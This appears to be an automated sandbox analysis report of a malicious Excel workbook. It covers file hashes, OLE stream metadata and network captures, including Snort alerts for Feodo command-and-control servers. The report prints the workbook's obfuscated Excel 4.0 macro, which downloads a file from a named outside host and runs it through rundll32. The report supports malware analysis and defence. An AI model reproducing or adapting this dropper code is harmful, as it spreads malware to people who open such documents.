SHA512: | 1a0e7b272e6c3516489433a1ac429f33112d3c016e26bfc56d7a5c496939003367341f20548f1bc6667691337ed3ded0d6102fd162c9ca184e5864ef8a9f6cad |
SSDEEP: | 3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUMd:OcKoSsxzNDZLDZjlbR868O8KlVH3jiK0 |
File Content Preview: | ........................>.......................H...........................E...F...G.......................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-02-19 10:48:36 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 917504 |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.351244264199 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e3 04 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.253278926706 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 |
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800 |
---|
General | |
---|---|
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 157800 |
Entropy: | 7.46869820242 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . |
Data Raw: | 09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
"=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
02/20/21-02:13:47.184877 | TCP | 2404302 | ET CNC Feodo Tracker Reported CnC Server TCP group 2 | 49166 | 443 | 192.168.2.22 | 108.170.20.75 |
02/20/21-02:14:30.920602 | TCP | 2404314 | ET CNC Feodo Tracker Reported CnC Server TCP group 8 | 49168 | 443 | 192.168.2.22 | 185.163.45.138 |
02/20/21-02:14:38.003411 | TCP | 2404324 | ET CNC Feodo Tracker Reported CnC Server TCP group 13 | 49170 | 443 | 192.168.2.22 | 200.52.147.93 |
02/20/21-02:15:44.697686 | TCP | 2404316 | ET CNC Feodo Tracker Reported CnC Server TCP group 9 | 49171 | 443 | 192.168.2.22 | 186.137.85.76 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 20, 2021 02:13:36.044743061 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.103359938 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.103523970 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.105571985 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.164473057 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.173185110 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.173247099 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.173286915 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.173326015 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.173352957 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.173363924 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.173378944 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.173413038 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.173428059 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.173445940 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.173486948 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.173511982 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.173523903 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.173527002 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.173572063 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.173599958 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.173615932 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.173636913 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.173682928 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.182909012 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.230966091 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.230998993 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.231014967 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.231034994 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.231051922 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.231123924 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.231123924 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.231144905 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.231164932 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.231180906 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.231184959 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.231189013 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.231194019 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.231198072 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.231203079 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.231219053 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.231220007 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.231236935 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.231262922 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.231271982 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.231276989 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.231287003 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.231292009 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.231314898 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.231333017 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.231347084 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.231348991 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.231374025 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.231388092 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.231447935 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.231463909 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.231481075 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.231487036 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.231494904 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.231511116 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.231522083 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.231532097 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.232677937 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.289669037 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.289793968 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.289855003 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.289987087 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.290026903 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.290218115 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.290275097 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.290353060 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.290394068 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.290458918 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.290496111 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.290541887 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.290560961 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.290602922 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.290622950 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.290668964 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.290687084 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.290731907 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.290746927 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.290787935 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.290807962 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.290812969 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.290851116 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.290869951 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.290914059 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.290940046 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.290987015 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.291012049 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.291054964 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.291073084 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.291115999 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.291135073 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.291196108 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.291217089 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.291260004 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 02:13:36.291279078 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 02:13:36.291321993 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 20, 2021 02:13:35.976202965 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 02:13:36.025083065 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Feb 20, 2021 02:13:35.976202965 CET | 192.168.2.22 | 8.8.8.8 | 0x315e | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Feb 20, 2021 02:13:36.025083065 CET | 8.8.8.8 | 192.168.2.22 | 0x315e | No error (0) | chipmania.it | CNAME (Canonical name) | IN (0x0001) | ||
Feb 20, 2021 02:13:36.025083065 CET | 8.8.8.8 | 192.168.2.22 | 0x315e | No error (0) | 185.81.0.78 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 185.81.0.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 20, 2021 02:13:36.105571985 CET | 0 | OUT | |
Feb 20, 2021 02:13:36.173185110 CET | 2 | IN |